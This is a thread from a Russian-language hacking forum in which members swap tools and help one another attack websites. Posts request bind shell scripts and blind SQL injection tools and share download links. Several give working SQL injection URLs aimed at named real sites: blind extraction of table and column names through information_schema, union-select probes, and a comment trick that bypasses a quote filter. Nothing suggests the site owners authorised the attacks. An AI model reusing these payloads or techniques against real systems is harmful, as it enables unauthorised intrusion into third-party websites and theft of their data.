Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Он не может даже скачать бинд скрипт на перле.Где его можно надыбать ?
     
  2. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Велемир, хватит использовать с99 везде и всюду. Есть и другие шеллы.

    или погугли bind.pl
     
    1 person likes this.
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    кто нибудь дайте линк на словари таблиц на Mysql. Раньше юзал но шас хз не помню
     
  4. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    здесь есть:

    тут
     
    1 person likes this.
  5. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    Посоветуйте какую-нить прогу для Blind sql inj.... Архив Grey'a выдает CRC Еррор :(
     
  6. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Неужели в гугле не найти?
    Тот же sipt4..
     
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Скрипт от Грея
    залил
    _http://www.sendspace.com/file/6e3r62
    а вообще..ещё посоветую bsqlbf
     
  8. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    спс у меня sipt4 есть, но как раз для него ещу дополнително
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Меня он вполне устраивает.
     
  10. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    ага,повторил,что такое BIND сервер и даже вспомнил команду bind в никсах )
     
  11. DeepXhadow

    DeepXhadow Elder - Старейшина

    Joined:
    19 Apr 2008
    Messages:
    57
    Likes Received:
    11
    Reputations:
    5
    blind sql inj

    Нету в сипте 4 посимвольного брута....


    Еще вопрос по blind...
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=1--
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+table_name+from+information_schema.tables+limit+1,1),1,1))>=200--
    Видно что вывод разный, написал кое-как кривой скрипт, сдампил таблицы...

    терь вопрос почему
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=1--
    и
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x276E65777327),1,1))>=200--
    Возвращают одинаковые результаты...
    таблица 0x276E65777327=news точно есть, т к
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+*+FROM+news),1,1))>=1--
     
    2 people like this.
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2DeepXhadow как нет посимвольного брута в сипт4?
    select+table_name+from+information_schema.tables+limit+{N16-300},1
     
    1 person likes this.
  13. laedafess

    laedafess Member

    Joined:
    11 Feb 2009
    Messages:
    70
    Likes Received:
    29
    Reputations:
    15
    DeepXhadow
    Code:
    http://www.aftech.ru/about/news/?nid=10+and+ascii(substring((select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6E657773+limit+1,1),1,1))>=1--
    1) При выводе колонок тоже нужен limit;
    2) Хексить нужно значение без кавычек, т.е. news=0x6e657773, а не 0x276E65777327.
     
    1 person likes this.
  14. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    Есть инъекция, число колонок то я нашел, но дальше при выполнения запроса
    http://www.clavesin.ru/addcard?dataID=-1227+union+select+1,2,3
    происходит редирект. Что с этим можно сделать, кроме как посимвольно брутить?
     
    #7334 nemaniak, 1 Jun 2009
    Last edited: 1 Jun 2009
  15. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    nemaniak а ты попробуй какимнить http дебагером! типа Accessdiver

    я глянул полей с выводом нема ((
     
    #7335 Rubaka, 1 Jun 2009
    Last edited: 1 Jun 2009
    1 person likes this.
  16. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    а после редиректа нет полей с выводом? часто бывает что они присутствуют. Ежели нету, но хочется норм.скули - поищи ее в другом месте.
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.clavesin.ru/articles/index_tplid4_recid3'.html

    without redirect
     
    2 people like this.
  18. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    195
    Likes Received:
    161
    Reputations:
    108
    http://www.clavesin.ru/articles/index_tplid4_recid3+or+1=1.html
    выдает ошибку, подскажите плиз почему? И как эту инъекцию раскрутить бы?
     
  19. farex

    farex Banned

    Joined:
    11 Mar 2009
    Messages:
    213
    Likes Received:
    85
    Reputations:
    6
    Там для выполнения запроса, должна присутствовать одинарная ковычка в запросе, а она "фильтруется"
    http://www.clavesin.ru/articles/index_tplid4_recid3/*'*/.html
     
    1 person likes this.
  20. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.thechimneypot.com/newsletter.php?id=11+order+by+5--
    http://www.thechimneypot.com/newsletter.php?id=-1+union+select+1,2,3,4,5
    Union'ом подобрал до 50 - без результатов.
     
Thread Status:
Not open for further replies.